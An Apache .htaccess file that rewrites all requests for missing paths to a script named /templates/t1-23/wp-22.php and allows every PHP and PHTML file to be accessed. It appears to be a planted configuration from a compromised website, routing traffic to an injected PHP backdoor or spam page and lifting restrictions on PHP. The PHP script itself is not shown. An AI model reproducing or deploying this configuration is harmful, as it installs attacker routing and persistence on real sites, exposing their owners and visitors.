<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^/templates/t1-23/wp-22.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . //templates/t1-23/wp-22.php [L]
</IfModule>
<FilesMatch ".(ph|phtml|php)$">
 Order allow,deny
 Allow from all
</FilesMatch>